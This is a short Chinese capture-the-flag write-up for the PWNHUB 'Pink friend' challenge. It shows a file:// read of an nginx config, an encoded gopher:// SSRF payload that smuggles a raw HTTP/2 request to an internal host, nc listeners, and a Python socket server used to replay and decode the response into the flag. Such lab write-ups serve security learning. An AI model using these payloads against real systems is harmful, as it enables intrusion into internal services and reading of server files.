PWNHUB-Pink friend
url=file:///etc/nginx/sites-enabled/default

使用 gopher
構造構造 http2
協議訪問 172.20.0.3:8080
。
本地監聽http2請求包
nc -lvvp 8000>1.txt
curl –http2-prior-knowledge:可以在不升級HTTP/1.1的情況下使用HTTP2。
$ curl --http2-prior-knowledgehttp://127.0.0.1:8000/
構造gopher協議
gopher://172.20.0.3:8080/_PRI%2520%252A%2520HTTP/2.0%250D%250A%250D%250ASM%250D%250A%250D%250A%2500%2500%2512%2504%2500%2500%2500%2500%2500%2500%2503%2500%2500%2500d%2500%2504%2540%2500%2500%2500%2500%2502%2500%2500%2500%2500%2500%2500%2504%2508%2500%2500%2500%2500%2500%253F%25FF%2500%2501%2500%2500%251E%2501%2505%2500%2500%2500%2501%2582%2584%2586A%258A%2508%259D%255C%250B%2581p%25DCx%2501%2517z%2588%2525%25B6P%25C3%25AB%25B8%25CA%25E0S%2503%252A/%252A

然後把返回的資料儲存到檔案 flag.txt
中

模擬HTTP2請求過程,對剛才返回的資料進行解碼。
nc -lvvp 8000 < flag.txt
也可以像f1sh師傅一樣用python啟一個socket服務。
import socket a = open("flag.txt", "rb").read() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = '127.0.0.1' port = 8000 s.bind((host, port)) s.listen(5) while True: c, addr = s.accept() c.send(a)
curl --http2-prior-knowledge http://127.0.0.1:8000 -v